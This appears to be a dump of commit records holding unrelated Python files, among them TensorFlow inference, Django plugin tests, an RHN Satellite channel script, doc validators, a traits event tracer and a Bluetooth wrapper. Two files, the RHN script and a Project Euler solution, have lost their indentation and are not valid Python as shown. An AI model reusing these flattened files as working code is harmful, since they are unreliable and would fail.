        FLAGS.checkpoint)
  g = tf.Graph()
  with g.as_default():
    input_image = PreprocessImage(FLAGS.image_path[0])

    with slim.arg_scope(inception.inception_v3_arg_scope()):
      logits, end_points = inception.inception_v3(
          input_image, num_classes=FLAGS.num_classes, is_training=False)

    bottleneck = end_points['PreLogits']
    # NOTE(review): init_op is built but never run; saver.restore() below is
    # what actually gives the model variables their values -- confirm whether
    # init_op is intentionally unused.
    init_op = control_flow_ops.group(variables.initialize_all_variables(),
                                     variables.initialize_local_variables(),
                                     data_flow_ops.initialize_all_tables())
    saver = tf_saver.Saver()
    sess = tf.Session()
    saver.restore(sess, FLAGS.checkpoint)

    # Run the evaluation on the image
    bottleneck_eval = np.squeeze(sess.run(bottleneck))
    # Emit the vector as a single comma-separated line, 3 decimal places.
    first = True
    for val in bottleneck_eval:
      if not first:
        sys.stdout.write(",")
      first = False
      sys.stdout.write('{:.3f}'.format(val))
    sys.stdout.write('\n')
if __name__ == '__main__':
  # Parse CLI flags into the module-level FLAGS before TF dispatches to main().
  parser = argparse.ArgumentParser()
  parser.add_argument('--checkpoint', type=str, default='data/2016_08/model.ckpt',
                      help='Checkpoint to run inference on.')
  parser.add_argument('--image_size', type=int, default=299,
                      help='Image size to run inference on.')
  parser.add_argument('--num_classes', type=int, default=6012,
                      help='Number of output classes.')
  parser.add_argument('image_path', nargs=1, default='')
  FLAGS = parser.parse_args()
  # tf.app.run() invokes main() defined above.
  tf.app.run()
| Python | 0 | |
d7568806a81c52f268673422dbbe60117f4b490c | Add plugins test cases | tests/test_plugin.py | tests/test_plugin.py | from rest_framework import status
from rest_framework.test import APITestCase
from django.contrib.auth import get_user_model
from api_bouncer.models import Api
# Resolve the active user model once at import time (honours AUTH_USER_MODEL).
User = get_user_model()
class ConsumerKeyTests(APITestCase):
    """Integration tests for the per-API plugin endpoint.

    NOTE(review): despite the class name ("ConsumerKeyTests"), every test
    here exercises /apis/<name>/plugins/ -- confirm the intended name.
    """

    def setUp(self):
        # One superuser (allowed to manage plugins) and one plain user.
        self.superuser = User.objects.create_superuser(
            'john',
            'john@localhost.local',
            'john123john'
        )
        self.user = User.objects.create_user(
            'jane',
            'jane@localhost.local',
            'jane123jane'
        )
        self.example_api = Api.objects.create(
            name='example-api',
            hosts=['example.com'],
            upstream_url='https://httpbin.org'
        )
        # Endpoint template; each test fills in the API name.
        self.url = '/apis/{}/plugins/'

    def test_api_add_plugin(self):
        """
        Ensure we can add a plugin to an api as superusers.
        """
        self.client.login(username='john', password='john123john')
        url = self.url.format(self.example_api.name)
        data = {
            'name': 'key-auth',
        }

        response = self.client.post(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(self.example_api.plugins.count(), 1)
        self.assertEqual(self.example_api.plugins.first().name, data['name'])

    def test_api_add_plugin_403(self):
        """
        Ensure we can add a plugin to an api only as superusers.
        """
        self.client.login(username='jane', password='jane123jane')
        url = self.url.format(self.example_api.name)
        data = {
            'name': 'key-auth',
        }

        response = self.client.post(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_api_add_plugin_wrong_name(self):
        """
        Ensure we can't add a plugin whose name is not a known plugin.
        """
        self.client.login(username='john', password='john123john')
        url = self.url.format(self.example_api.name)
        data = {
            'name': 'na-ah',
        }

        response = self.client.post(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data['errors'], 'Invalid plugin name')

    def test_api_add_plugin_modify_partially_config(self):
        """
        Ensure we can partially modify a plugin configuration.
        """
        self.client.login(username='john', password='john123john')
        url = self.url.format(self.example_api.name)
        data = {
            'name': 'key-auth',
        }

        response = self.client.post(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(self.example_api.plugins.count(), 1)
        self.assertEqual(self.example_api.plugins.first().name, data['name'])

        # Re-posting with a partial config must merge, not replace.
        expected_res = response.data
        expected_res['config'].update({'anonymous': 'citizen-four'})
        data.update({'config': {'anonymous': 'citizen-four'}})

        response = self.client.post(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(self.example_api.plugins.count(), 1)
        self.assertEqual(response.data, expected_res)

    def test_api_add_plugin_no_extra_keys(self):
        """
        Ensure we can't add arguments not defined on plugin's schema.
        """
        self.client.login(username='john', password='john123john')
        url = self.url.format(self.example_api.name)
        data = {
            'name': 'key-auth',
        }

        response = self.client.post(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(self.example_api.plugins.count(), 1)
        self.assertEqual(self.example_api.plugins.first().name, data['name'])

        # A config key outside the plugin schema must be rejected.
        data.update({'config': {'you_shall_not_pass': True}})

        response = self.client.post(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
| Python | 0.000001 | |
b29fe95eb2cb86a7ae9170fbf8ceb2533bc84578 | Add the photo.index module (with minimal functionality so far). | photo/index.py | photo/index.py | """Provide the class Index which represents an index of photos.
"""
import os
import os.path
import fnmatch
from collections import MutableSequence
import yaml
class Index(MutableSequence):
    """An index of photos: a mutable sequence of per-image dicts
    (``{'filename': ..., 'tags': [...]}``) that can be loaded from and
    saved to a YAML file.
    """

    defIdxFilename = ".index.yaml"

    def __init__(self, idxfile=None, imgdir=None):
        """Create an index, optionally reading *idxfile* or scanning *imgdir*."""
        super(Index, self).__init__()
        self.directory = None
        self.idxfilename = None
        self.items = []
        if idxfile:
            self.read(idxfile)
        elif imgdir:
            self.readdir(imgdir)

    def __len__(self):
        return len(self.items)

    def __getitem__(self, index):
        return self.items.__getitem__(index)

    def __setitem__(self, index, value):
        self.items.__setitem__(index, value)

    def __delitem__(self, index):
        self.items.__delitem__(index)

    def insert(self, index, value):
        self.items.insert(index, value)

    def _idxfilename(self, idxfile):
        """Determine the index file name for reading and writing.

        Precedence: explicit *idxfile*, then the last used file name, then
        the default name inside the index directory (or the CWD).
        """
        if idxfile is not None:
            return os.path.abspath(idxfile)
        elif self.idxfilename is not None:
            return self.idxfilename
        else:
            d = self.directory if self.directory is not None else os.getcwd()
            return os.path.abspath(os.path.join(d, self.defIdxFilename))

    def readdir(self, imgdir):
        """Create a new index of all image files in a directory."""
        self.directory = os.path.abspath(imgdir)
        self.items = []
        for f in sorted(os.listdir(self.directory)):
            if (os.path.isfile(os.path.join(self.directory, f)) and
                    fnmatch.fnmatch(f, '*.jpg')):
                self.items.append({'filename': f, 'tags': []})

    def read(self, idxfile=None):
        """Read the index from a file."""
        self.idxfilename = self._idxfilename(idxfile)
        self.directory = os.path.dirname(self.idxfilename)
        with open(self.idxfilename, 'rt') as f:
            # safe_load: plain yaml.load can execute arbitrary constructors
            # from an untrusted index file and is deprecated without an
            # explicit Loader.  "or []" keeps items a list for empty files.
            self.items = yaml.safe_load(f) or []

    def write(self, idxfile=None):
        """Write the index to a file."""
        self.idxfilename = self._idxfilename(idxfile)
        self.directory = os.path.dirname(self.idxfilename)
        with open(self.idxfilename, 'wt') as f:
            # safe_dump suffices: items hold only plain dicts/lists/strings.
            yaml.safe_dump(self.items, f, default_flow_style=False)
| Python | 0 | |
eff993eac0924299cd273d0c582e24c57f2c4a84 | Add 263-ugly-number.py | 263-ugly-number.py | 263-ugly-number.py | """
Question:
Ugly Number
Write a program to check whether a given number is an ugly number.
Ugly numbers are positive numbers whose prime factors only include 2, 3, 5. For example, 6, 8 are ugly while 14 is not ugly since it includes another prime factor 7.
Note that 1 is typically treated as an ugly number.
Credits:
Special thanks to @jianchao.li.fighter for adding this problem and creating all test cases.
Performance:
1. Total Accepted: 19816 Total Submissions: 60714 Difficulty: Easy
2. Your runtime beats 60.64% of python submissions.
"""
class Solution(object):
    def isUgly(self, num):
        """Return True if *num* is an ugly number (prime factors only 2, 3, 5).

        :type num: int
        :rtype: bool
        """
        # Ugly numbers are positive by definition; 0 and negatives never are.
        if num <= 0:
            return False
        # Strip every factor of 2, 3 and 5; an ugly number reduces to 1.
        for ugly_divisor in [2, 3, 5]:
            while (num % ugly_divisor) == 0:
                # Floor division keeps num an int: plain "/=" would turn it
                # into a float under Python 3 and eventually lose precision.
                num //= ugly_divisor
        return num == 1
# Inline smoke tests: the module checks itself at import time.
assert Solution().isUgly(0) is False
assert Solution().isUgly(1) is True
assert Solution().isUgly(2) is True
assert Solution().isUgly(3) is True
assert Solution().isUgly(4) is True
assert Solution().isUgly(5) is True
assert Solution().isUgly(6) is True
assert Solution().isUgly(7) is False
assert Solution().isUgly(8) is True
assert Solution().isUgly(9) is True
assert Solution().isUgly(10) is True
assert Solution().isUgly(11) is False
assert Solution().isUgly(12) is True
assert Solution().isUgly(14) is False
assert Solution().isUgly(-2147483648) is False
| Python | 0.999999 | |
063096a5b52945666ec2d61bfe5201ad53461614 | Create rhn-channel-add-scl.py | rhn-channel-add-scl.py | rhn-channel-add-scl.py | #!/usr/bin/python
import xmlrpclib
import sys, array
"""RHN Satellite API setup"""
SATELLITE_URL = "https://rhn.domain.tld/rpc/api"
SATELLITE_LOGIN = "username"
SATELLITE_PASSWORD = "password"
"""If the user didn't specify any hosts, show usage."""
if len(sys.argv) < 2:
sys.exit("Usage:\n\t"+sys.argv[0]+" <hostname> [hostname] ...")
"""Connect to RHN Satellite API"""
client = xmlrpclib.Server(SATELLITE_URL, verbose=0)
key = client.auth.login(SATELLITE_LOGIN, SATELLITE_PASSWORD)
# systems we will add channel to
ids = array.array('i')
# channel we will add to systems
to_add = ''
for hostname in sys.argv[1:]:
"""
Assume every argument is a hostname.
Search my RHN Satellite systems for any
system whose hostname starts with any
the arguments given.
Takes the IDs of all found systems and
stores them in a (global) variable.
"""
# get a list of all systems that have this hostname
systems = client.system.search.hostname(key, hostname)
# add these system's ids to the list of global ids
for system in systems:
ids.append(system['id'])
if len(ids) != 0:
"""
If systems were found, get the first
one and find the name of the SCL
channel.
Otherwise, throw an error and exit.
"""
# try to find SCL in the list of channels this system is
# NOT currently subscribed to
channels = client.system.listSubscribableChildChannels(key, ids[0])
for channel in channels:
"""
Search through all returned channels for
the SCL channel and save its name.
"""
if channel['label'].find('scl-') != -1:
to_add = channel['label']
break
if len(to_add) < 2:
"""
If the channel was not found, try to find SCL in the list
of channels this system IS subscribed to. The API
doesn't allow listing of all channels associated with a sys.
"""
channels = client.system.listSubscribedChildChannels(key, ids[0])
for channel in channels:
"""
Search through all returned channels for
the SCL channel and save its name.
"""
if channel['label'].find('scl-') != -1:
to_add = channel['label']
break
else:
sys.stderr.write('No systems were found')
exit(1)
for id in ids:
"""
Add the SCL channel to every system found above.
"""
# need to get all subscribed channels first
# since setChildChannels is absolute.
current_channels = client.system.listSubscribedChildChannels(key, id)
# create an array of the channels system will be subscribed to
# and include existing channels.
channels = []
for channel in current_channels:
channels.append(channel['label'])
for channel in channels:
# if the channel to be added already exists, don't double add
if channel == to_add:
break
else:
# if the channel doesn't already exist, add it!
channels.append(to_add)
# finally, set all those channels as the current subscriptions
client.system.setChildChannels(key, id, channels)
# write a success message
print("\033[1;32mSuccess:\033[1;m\nSystem "+str(id)+": "+str(channels))
"""Kill the connection to RHN"""
client.auth.logout(key)
| Python | 0.000002 | |
cd44e4a62e8c8f8ddba0634ccc0bb157f7745726 | add 129 | vol3/129.py | vol3/129.py | def A(n):
if n % 5 == 0:
return 1
x = 1
ret = 1
while x != 0:
x = (x * 10 + 1) % n
ret += 1
return ret
if __name__ == "__main__":
LIMIT = 10 ** 6
i = LIMIT + 1
while A(i) <= LIMIT:
i += 2
print i
| Python | 0.999994 | |
a8663257ad4b4d0688c54d0e94949ab602c61561 | allow validation for empty/missing @brief. | util/py_lib/seqan/dox/validation.py | util/py_lib/seqan/dox/validation.py | #!/usr/env/bin python
"""Some validation for proc_doc.Proc*"""
__author__ = 'Manuel Holtgrewe <manuel.holtgrewe@fu-berlin.de>'
class ProcDocValidator(object):
    """Base class for proc_doc.Proc* validators (visitor pattern).

    Subclasses override :meth:`validate` and report findings through the
    message printer handed to the constructor.
    """

    def __init__(self, msg_printer):
        self.msg_printer = msg_printer

    def validate(self, proc_entry):
        """Default implementation: accept every entry."""
        return
class MissingSignatureValidator(ProcDocValidator):
    """Warn about entries that should have a @signature but have none."""

    def validate(self, proc_entry):
        # Entry kinds that legitimately carry no @signature clause.
        exempt_kinds = ['variable', 'member_variable', 'tag', 'grouped_tag', 'typedef',
                        'grouped_typedef', 'signature', 'concept', 'member_typedef',
                        'enum', 'grouped_enum']
        if not hasattr(proc_entry, 'signatures') or proc_entry.kind in exempt_kinds:
            return
        if not proc_entry.signatures:
            self.msg_printer.printTokenError(
                proc_entry.raw.first_token,
                'Missing @signature for this entry!', 'warning')
class MissingParameterDescriptionValidator(ProcDocValidator):
    """Warn when a @param/@tparam/@return lacks a name, type or description."""

    def validate(self, proc_entry):
        sections = ['params', 'tparams', 'returns']
        if not any(hasattr(proc_entry, s) for s in sections):
            return
        # First pass: items missing a name or a type.
        for section in sections:
            for item in getattr(proc_entry, section, []):
                if hasattr(item, 'name') and not item.name:
                    msg = 'Missing name for @%s' % section[:-1]
                elif hasattr(item, 'type') and not item.type:
                    msg = 'Missing type for @%s' % section[:-1]
                else:
                    continue
                self.msg_printer.printTokenError(item.raw.first_token, msg, 'warning')
        # Second pass: items with an empty description.
        for section in sections:
            for item in getattr(proc_entry, section, []):
                if item.desc.empty:
                    self.msg_printer.printTokenError(
                        item.raw.first_token,
                        'Missing description for @%s' % section[:-1], 'warning')
class ReturnVoidValidator(ProcDocValidator):
    """Warn about redundant "@return void" clauses."""

    def validate(self, proc_entry):
        for ret in getattr(proc_entry, 'returns', []):
            if ret.type == 'void':
                self.msg_printer.printTokenError(
                    ret.raw.first_token,
                    '@return superflous for "void" type -- simply show "void" in signature.',
                    'warning')
class EmptyBriefValidator(ProcDocValidator):
    """Warn when an entry has no non-empty @brief section."""

    def validate(self, proc_entry):
        # Pages document themselves; a @brief is not expected there.
        if proc_entry.kind in ('mainpage', 'page'):
            return
        if not hasattr(proc_entry, 'brief'):
            return
        if not proc_entry.brief or proc_entry.brief.empty:
            self.msg_printer.printTokenError(
                proc_entry.raw.first_token,
                'Missing non-empty @brief clause.', 'warning')
# Array with the validator classes to use.
# Extend this list when adding a new ProcDocValidator subclass.
VALIDATORS = [MissingSignatureValidator,
              MissingParameterDescriptionValidator,
              ReturnVoidValidator,
              EmptyBriefValidator]
| #!/usr/env/bin python
"""Some validation for proc_doc.Proc*"""
__author__ = 'Manuel Holtgrewe <manuel.holtgrewe@fu-berlin.de>'
class ProcDocValidator(object):
    """Base validator for proc_doc.Proc* entries (visitor pattern)."""

    def __init__(self, msg_printer):
        # Printer used by subclasses to report warnings and errors.
        self.msg_printer = msg_printer

    def validate(self, proc_entry):
        # The base implementation accepts everything.
        return
class MissingSignatureValidator(ProcDocValidator):
    """Validates for missing or empty signature."""
    # Entry kinds that legitimately carry no @signature.
    EXEMPT_KINDS = frozenset([
        'variable', 'member_variable', 'tag', 'grouped_tag', 'typedef',
        'grouped_typedef', 'signature', 'concept', 'member_typedef',
        'enum', 'grouped_enum'])
    def validate(self, proc_entry):
        """Warn when *proc_entry* should have a @signature but has none."""
        if not hasattr(proc_entry, 'signatures'):
            return  # Entry type has no signatures member at all.
        if proc_entry.kind in self.EXEMPT_KINDS:
            return  # Exempt kind.
        if proc_entry.signatures:
            return  # At least one signature is present.
        self.msg_printer.printTokenError(
            proc_entry.raw.first_token,
            'Missing @signature for this entry!',
            'warning')
class MissingParameterDescriptionValidator(ProcDocValidator):
    """Warns if the description is missing for a @param or @return."""
    def validate(self, proc_entry):
        """Warn about nameless/typeless or undescribed @param/@tparam/@return.
        Two separate passes are made so that all name/type warnings for an
        entry are printed before any missing-description warnings.
        """
        if not hasattr(proc_entry, 'params') and \
           not hasattr(proc_entry, 'tparams') and \
           not hasattr(proc_entry, 'returns'):
            return  # Skip if type has no parameters
        # Check for empty name.
        for key in ['params', 'tparams', 'returns']:
            if not hasattr(proc_entry, key):
                continue  # Skip if missing.
            for val in getattr(proc_entry, key):
                # key[:-1] strips the plural 's' to recover the tag name.
                if hasattr(val, 'name') and not val.name:
                    msg = 'Missing name for @%s' % key[:-1]
                elif hasattr(val, 'type') and not val.type:
                    msg = 'Missing type for @%s' % key[:-1]
                else:
                    continue  # skip
                self.msg_printer.printTokenError(val.raw.first_token, msg, 'warning')
        # Check for empty description.
        for key in ['params', 'tparams', 'returns']:
            if not hasattr(proc_entry, key):
                continue  # Skip if missing.
            for val in getattr(proc_entry, key):
                if val.desc.empty:
                    msg = 'Missing description for @%s' % key[:-1]
                    self.msg_printer.printTokenError(val.raw.first_token, msg, 'warning')
class ReturnVoidValidator(ProcDocValidator):
    """Warns if there is a (superfluous) @return void entry."""
    def validate(self, proc_entry):
        """Emit a warning for each @return entry whose type is 'void'.
        Fix: corrected the misspelling 'superflous' in both the docstring
        and the emitted warning message.
        """
        if not hasattr(proc_entry, 'returns'):
            return  # Skip if type has no returns member.
        for r in proc_entry.returns:
            if r.type == 'void':
                msg = '@return superfluous for "void" type -- simply show "void" in signature.'
                self.msg_printer.printTokenError(r.raw.first_token, msg, 'warning')
# Array with the validator classes to use.
VALIDATORS = [MissingSignatureValidator,
MissingParameterDescriptionValidator,
ReturnVoidValidator]
| Python | 0 |
e1087ac3c07e5b25c1f60ef82e8785973fa5bb79 | add an event_tracer module | traits/util/event_tracer.py | traits/util/event_tracer.py | # This software is OSI Certified Open Source Software.
# OSI Certified is a certification mark of the Open Source Initiative.
#
# Copyright (c) 2013, Enthought, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Enthought, Inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Multi-threaded trait event tracer.
Place this script somewhere importable
(e.g. C:\\Python27\\Lib\\site-packages\\).
Use it as follows::
    >>> from traits.util.event_tracer import record_events
>>> with record_events('C:\\dev\\trace'):
... my_model.some_trait = True
This will install a tracer that will record all events that occur from
setting of some_trait on the my_model instance.
The results will be stored in one file per running thread in the
directory 'C:\\dev\\trace'. The files are named after the thread being
traced.
"""
from contextlib import contextmanager
import inspect
import os
import threading
from datetime import datetime
from traits import trait_notifiers
# Template for a "trait changed" record; the 'direction' character ('>')
# is repeated to an arrow whose width tracks the handler nesting depth.
CHANGEMSG = (
    u"{time} {direction:-{direction}{length}} '{name}' changed from "
    u"{old} to {new} in '{class_name}'\n")
# Template for the "CALLING handler" line written after a change record.
CALLINGMSG = (
    u"{time} {action:>{gap}}: '{handler}' in {source}\n")
# Template for the line written when a handler returns (or raises).
EXITMSG = u"{direction:-{direction}{length}} EXIT: '{handler}'{exception}\n"
class ChangeEventRecorder(object):
    """ A thread aware trait change recorder
    The class manages multiple ThreadChangeEventRecorders which record
    trait change events for each thread in a separate file.
    """
    def __init__(self, trace_directory):
        """ Object constructor
        Parameters
        ----------
        trace_directory : string
            The directory where the change log for each thread will be saved
        """
        # Maps thread name -> ThreadChangeEventRecorder.
        self.tracers = {}
        # Guards self.tracers, which is touched from every traced thread.
        self.tracer_lock = threading.Lock()
        self.trace_directory = trace_directory
    def close(self):
        """ Close log files.
        """
        with self.tracer_lock:
            # Detach the dict under the lock so no new writes race the close.
            tracers = self.tracers
            self.tracers = {}
            for tracer in tracers.values():
                tracer.fh.close()
    def pre_tracer(self, obj, name, old, new, handler):
        """ The traits pre event tracer.
        This method should be set as the global pre event tracer for traits.
        """
        tracer = self._get_tracer()
        tracer.pre_tracer(obj, name, old, new, handler)
    def post_tracer(self, obj, name, old, new, handler, exception=None):
        """ The traits post event tracer.
        This method should be set as the global post event tracer for traits.
        """
        tracer = self._get_tracer()
        tracer.post_tracer(obj, name, old, new, handler, exception=exception)
    def _get_tracer(self):
        # Return (creating on first use) the per-thread recorder; each
        # thread gets its own '<thread-name>.trace' file.
        with self.tracer_lock:
            thread = threading.current_thread().name
            if thread not in self.tracers:
                filename = os.path.join(self.trace_directory,
                                        '{}.trace'.format(thread))
                fh = open(filename, 'wb')
                tracer = ThreadChangeEventRecorder(fh)
                self.tracers[thread] = tracer
                return tracer
            else:
                return self.tracers[thread]
class ThreadChangeEventRecorder(object):
    """ A single thread trait change event recorder.
    """
    def __init__(self, fh):
        """ Class constructor
        Parameters
        ----------
        fh : stream
            An io stream to store the records for each trait change.
        """
        # Current nesting depth of handler dispatch; drives record indent.
        self.indent = 1
        self.fh = fh
    def pre_tracer(self, obj, name, old, new, handler):
        """ Record a string representation of the trait change dispatch
        """
        indent = self.indent
        time = datetime.utcnow().isoformat(' ')
        handle = self.fh
        # One line for the change itself, one for the handler being called.
        handle.write(
            CHANGEMSG.format(
                time=time,
                direction='>',
                length=indent*2,
                name=name,
                old=old,
                new=new,
                class_name=obj.__class__.__name__,
            ).encode('utf-8'),
        )
        handle.write(
            CALLINGMSG.format(
                time=time,
                gap=indent*2 + 9,
                action='CALLING',
                handler=handler.__name__,
                source=inspect.getsourcefile(handler),
            ).encode('utf-8'),
        )
        self.indent += 1
    def post_tracer(self, obj, name, old, new, handler, exception=None):
        """ Record a string representation of the trait change return
        """
        self.indent -= 1
        handle = self.fh
        indent = self.indent
        if exception:
            exception_msg = ' [EXCEPTION: {}]'.format(exception)
        else:
            exception_msg = ''
        handle.write(
            EXITMSG.format(
                direction='<',
                length=indent*2,
                handler=handler.__name__,
                exception=exception_msg,
            ).encode('utf-8'),
        )
        if indent == 1:
            # Back at top level: blank line separates dispatch groups.
            handle.write(u'\n'.encode('utf-8'))
@contextmanager
def record_events(trace_directory):
    """ Record trait change events.
    Installs a ChangeEventRecorder as the global traits pre/post event
    tracer for the duration of the ``with`` block, then uninstalls it and
    closes all per-thread trace files.
    Parameters
    ----------
    trace_directory : string
        The directory where the change log for each event will be saved
    """
    recorder = ChangeEventRecorder(trace_directory)
    trait_notifiers.set_change_event_tracers(
        pre_tracer=recorder.pre_tracer, post_tracer=recorder.post_tracer)
    try:
        yield
    finally:
        # Always restore the global tracer state, even on exception.
        trait_notifiers.clear_change_event_tracers()
        recorder.close()
| Python | 0.000001 | |
0ede4e22370a3f8217fee8ff995a9c7057d8b00b | Add test for redis test helper | vumi_http_retry/tests/test_redis.py | vumi_http_retry/tests/test_redis.py | import json
from twisted.trial.unittest import TestCase
from twisted.internet.defer import inlineCallbacks
from vumi_http_retry.tests.redis import create_client, zitems
class TestRedis(TestCase):
    """Exercises the redis test helpers (create_client / zitems) against a
    live redis instance, using the sorted set at key 'foo'.
    """
    @inlineCallbacks
    def setUp(self):
        self.redis = yield create_client()
    @inlineCallbacks
    def tearDown(self):
        # Remove the key used by the tests, then drop the connection.
        yield self.redis.delete('foo')
        yield self.redis.transport.loseConnection()
    @inlineCallbacks
    def test_add_request(self):
        # zitems should decode each JSON member and pair it with its score.
        self.assertEqual((yield zitems(self.redis, 'foo')), [])
        yield self.redis.zadd('foo', 1, json.dumps({'bar': 23}))
        self.assertEqual((yield zitems(self.redis, 'foo')), [
            (1, {'bar': 23}),
        ])
        yield self.redis.zadd('foo', 2, json.dumps({'baz': 42}))
        self.assertEqual((yield zitems(self.redis, 'foo')), [
            (1, {'bar': 23}),
            (2, {'baz': 42}),
        ])
| Python | 0 | |
d0237f2b77a49933a4b22b43f967e414be196ff4 | Add sysmod module to replace old introspection modules | salt/modules/sysmod.py | salt/modules/sysmod.py | '''
The sys module provides information about the available functions on the
minion.
'''
def __virtual__():
    '''
    Load this module under the virtual name ``sys`` (the on-disk module is
    named ``sysmod``, presumably to avoid clashing with the stdlib ``sys``).
    '''
    return 'sys'
def doc(module=''):
    '''
    Return the docstrings for all modules, these strings are aggregated into
    a single document on the master for easy reading.
    CLI Example::
        salt \* sys.doc
    '''
    # An empty prefix matches every loaded function.
    return dict((fun, __salt__[fun].__doc__)
                for fun in __salt__ if fun.startswith(module))
def list_functions(module=''):
    '''
    List the functions. Optionally, specify a module to list from.
    CLI Example::
        salt \* sys.list_functions
    '''
    # With no module given the prefix is empty and matches everything.
    prefix = '{0}.'.format(module) if module else ''
    return sorted(set(func for func in __salt__ if func.startswith(prefix)))
def list_modules():
    '''
    List the modules loaded on the minion
    CLI Example::
        salt \* sys.list_modules
    '''
    modules = set()
    for func in __salt__:
        # Function names look like 'module.function'; keep the module part.
        mod, sep, _ = func.partition('.')
        if sep:
            modules.add(mod)
    return sorted(modules)
def reload_modules():
    '''
    Tell the minion to reload the execution modules
    CLI Example::
        salt \* sys.reload_modules
    '''
    # This is handled inside the minion.py file, the function is caught before
    # it ever gets here
    return True
| Python | 0 | |
fa55ceb71ff254f8ed3413a35acfe20da7c03a91 | Create BT Comm wrapper class | rxbtcomm.py | rxbtcomm.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 F Dou<programmingrobotsstudygroup@gmail.com>
# See LICENSE for details.
import bluetooth
import logging
class RxBtComm(object):
    """BT communication wrapper:
    Attributes:
        addr: A string representing the device address.
        name: A string representing the device name.
    """
    # NOTE(review): configuring logging at class-definition time is a side
    # effect; kept as-is for backward compatibility.
    logging.basicConfig(level=logging.DEBUG)
    def __init__(self, addr, name=None):
        """Return a RxBtComm object
        param *addr* device address
        param *name* device name
        """
        self.addr = addr
        self.name = name
        self.sock = None  # Populated by connect().
    def connect(self):
        """Open an RFCOMM connection to self.addr.
        Returns the remote device name on success, '' on failure.
        """
        try:
            port = 1  # RFCOMM channel used by the remote service.
            self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
            self.sock.connect((self.addr, port))
            return bluetooth.lookup_name(self.addr)
        except Exception as e:
            logging.exception(e)
            return ''
    def disconnect(self):
        """Close the socket; errors are logged, never raised."""
        try:
            self.sock.close()
        except Exception as e:
            logging.exception(e)
        self.sock = None
    def send(self, cmd):
        """Send a command to the connected host."""
        self.sock.send(cmd)
    def recieve(self, size=1024):
        """Receive up to *size* bytes from the connected host.
        Fix: the original body was ``self.sock.recieve(cmd)``, which
        referenced the undefined name ``cmd`` and a nonexistent socket
        method; BluetoothSocket receives via ``recv``.
        """
        return self.sock.recv(size)
    # Correctly spelled alias for new callers; 'recieve' is kept for
    # backward compatibility.
    receive = recieve
### Replace xx:xx:xx:xx:xx:xx with your test device address
#test = RXComm('xx:xx:xx:xx:xx:xx', 'Test Device')
#test.connect()
#test.send('date')
#test.disconnect()
| Python | 0 | |
4053aa99100e2fdc1a342a472492f53138a66d6b | Add internal utils module | pies/_utils.py | pies/_utils.py | """
pies/_utils.py
Utils internal to the pies library and not meant for direct external usage.
Copyright (C) 2013 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
def with_metaclass(meta, *bases):
    """
    Enables use of meta classes across Python Versions.
    taken from jinja2/_compat.py
    Use it like this::
        class BaseForm(object):
            pass
        class FormType(type):
            pass
        class Form(with_metaclass(FormType, BaseForm)):
            pass
    """
    # A dummy metaclass whose __new__ intercepts the creation of the
    # 'temporary_class' below; when that temporary class is later
    # subclassed, the real class is built with the requested metaclass
    # and bases instead.  This sidesteps the incompatible Python 2
    # (__metaclass__) and Python 3 (metaclass=...) syntaxes.
    class metaclass(meta):
        __call__ = type.__call__
        __init__ = type.__init__
        def __new__(cls, name, this_bases, d):
            if this_bases is None:
                # Creating the temporary placeholder class itself.
                return type.__new__(cls, name, (), d)
            # Subclassing the placeholder: build the real class now.
            return meta(name, bases, d)
    return metaclass('temporary_class', None, {})
def unmodified_isinstance(*bases):
    """
    When called in the form MyOverrideClass(unmodified_isinstance(BuiltInClass))
